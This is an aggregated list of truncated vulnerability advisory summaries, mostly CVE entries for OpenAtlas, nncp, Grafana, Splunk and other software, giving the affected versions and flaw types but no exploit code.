CVE-2025-57156

Summary (CVE-2025-57156) : A NULL pointer dereference in the owntone-server component, specifically in the dacp_reply_playqueueedit_clear function in src/httpd_dacp.c, can be triggered by a remote attacker through commits up to 6d604a1 (post-version 28.12). This vulnerability allows remote Denial...

CVE-2023-25478

Cross-Site Request Forgery CSRF vulnerability in Jason Rouet Weather Station plugin = 3.8.12 versions...

CVE-2025-67510

Neuron is a PHP framework for AI Agents. Versions 2.8.11 and earlier have a vulnerability in the MySQLWriteTool that can execute arbitrary SQL provided by the caller via PDO::prepare() and execute(), without semantic restrictions. In an LLM/agent context this enables prompt injection or indirect ...

CVE-2025-60917

A reflected cross-site scripting XSS vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter...

EUVD-2025-198896

An issue in the size query parameter /views/file.py of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute a path traversal via a crafted request...

CVE-2025-56423

An issue in Austrian Academy of Sciences AW Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages...

PT-2025-47933

A reflected cross-site scripting XSS vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter...

CVE-2025-60917

A reflected cross-site scripting XSS vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter...

Austrian Academy of Sciences OpenAtlas 安全漏洞

Austrian Academy of Sciences OpenAtlas is a database application dealing with archaeology and history organized by the Austrian Academy of Sciences in Austria. A security vulnerability exists in Austrian Academy of Sciences OpenAtlas version 8.12.0 that stems from a login error message that could...

CVE-2025-60916

CVE-2025-60916 is a reflected XSS vulnerability in Austrian OpenAtlas. The issue affects the /overview/network/ endpoint prior to OpenAtlas v8.12.0, where an attacker can inject a crafted payload into the charge parameter to execute arbitrary JavaScript in a user’s browser. The Red Hat/EU ENISA/O...

DEBIAN-CVE-2025-60020

nncp before 8.12.0 allows path traversal for reading or writing during freqing and file saving via a crafted path in packet data...

PT-2025-39247

Name of the Vulnerable Software and Affected Versions nncp versions prior to 8.12.0 Description The software contains a path traversal flaw that could allow reading or writing to files. This issue occurs during the process of freqing and saving files when handling crafted paths within packet data...

U.S. Dept Of Defense: CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████

A vulnerability, identified as CVE-2025-4123, was discovered in Grafana OSS and Enterprise versions 8.x through 12.x. The vulnerability allowed unauthenticated attackers to chain multiple flaws, including an open redirect through path traversal in the public redirect handler, stored cross-site...

Jellyfin Parameter Injection Vulnerability

Jellyfin is a freeware media system. It allows you to control the management and streaming of media. It is an alternative to the proprietary Emby and Plex, and can serve media from a dedicated server to end-user devices through multiple applications. A parameter injection vulnerability exists in...

CVE-2022-45812

creationtimestamp| type| source ---|---|--- 2023-05-08 16:51:22+00:00| seen| https://t.me/cibsecurity/63421...

SUSE CVE-2019-15729

An issue was discovered in GitLab Community and Enterprise Edition 8.18 through 12.2.1. An internal endpoint unintentionally disclosed information about the last pipeline that ran for a merge request...

CVE-2023-0081

The MonsterInsights WordPress plugin before 8.12.1 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

PT-2022-26971 · Splunk · Splunk Enterprise

Name of the Vulnerable Software and Affected Versions: Splunk Enterprise versions prior to 8.1.12 Splunk Enterprise versions prior to 8.2.9 Splunk Enterprise versions prior to 9.0.2 Description: The issue allows for a Reflected Cross Site Scripting via JavaScript Object Notation JSON in a query...

SafeNet KeySecure Management Console 注入漏洞

SafeNet KeySecure Management is a secure software package from SafeNet USA. A security vulnerability exists in SafeNet KeySecure Management Console that stems from the vulnerability of version 8.12.0 of SafeNet KeySecure Management Console to HTTP response splitting attacks. A remote attacker can...

PT-2018-2144 · Mysql Server +1 · Mysql Connectors +1

Name of the Vulnerable Software and Affected Versions: MySQL Connectors versions 8.0.12 and prior Description: The issue is related to insufficient access control in the Connector/J subcomponent of the MySQL Connectors system. It allows a remote attacker to gain unauthorized access to protected...